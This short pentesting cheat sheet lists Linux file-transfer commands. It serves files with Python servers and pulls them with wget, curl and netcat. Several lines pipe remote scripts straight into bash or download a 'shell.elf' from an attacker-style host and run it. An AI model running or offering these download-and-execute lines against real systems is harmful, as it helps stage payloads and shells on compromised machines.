Linux
Python (HTTP Server)
python -m SimpleHTTPServer 80
python3 -m http.serverPython (FTP Server)
Python -m pyftpdlib -p 21 --writeWget
wget http://10.10.10.10/linenum.sh
wget -O - 10.10.10.10/linenum.sh | bash
wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elfCurl
curl http://10.10.10.10/linenum.sh -o linenum.sh
curl Kali_IP/file -o /tmp/file && chmod +x /tmp/file && /tmp/fileNetcat
nc -lvp 5555 < linenum.sh
nc 10.10.10.10 5555 | bashTFTP
SCP
axel
Last updated